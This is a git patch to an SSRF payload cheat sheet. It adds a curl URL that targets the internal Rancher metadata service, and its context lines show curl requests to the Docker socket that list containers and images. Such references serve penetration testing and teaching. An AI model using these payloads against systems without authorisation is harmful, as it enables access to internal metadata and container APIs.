From 78103d13a1edcc621b271bcae38dac176c806342 Mon Sep 17 00:00:00 2001
From: Techbrunch <Techbrunch@users.noreply.github.com>
Date: Mon, 8 Oct 2018 21:46:57 +0200
Subject: [PATCH] Add Rancher Metadata Service

---
 SSRF injection/README.md | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 17707b5..389c924 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -436,6 +436,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
 ```
 
+### SSRF URL for Rancher
+
+```powershell
+curl http://rancher-metadata/<version>/<path>
+```
+
+More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
 
 ## Thanks to
 
@@ -451,4 +458,4 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
 * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
 * [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
-* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
\ No newline at end of file
+* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)